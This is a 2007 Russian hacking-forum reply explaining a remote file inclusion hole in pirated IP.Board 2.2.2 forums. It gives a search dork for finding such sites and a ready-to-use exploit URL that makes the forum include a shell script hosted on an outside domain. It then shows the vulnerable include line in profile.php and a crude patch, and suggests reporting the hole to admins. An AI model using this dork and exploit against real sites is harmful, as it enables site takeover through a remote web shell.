16.07.2007, 18:07
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
Сообщение от a1ex
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
Код:
dork: "Русская версия IP.Board 2.2.2 © 2007 IPS, Inc."
exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt
Куда уж подробнее??
Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил..
Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит..
Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так:
/source/action_public/profile.php
строка 885:
Код:
if ( $chk )
{
@include ($chk);
exit();
}
Меняем на:
Код:
if ( $chk )
{
echo "Fuck you, Spilberg... Fixed by 5hr4M...";
exit();
}
|
|
|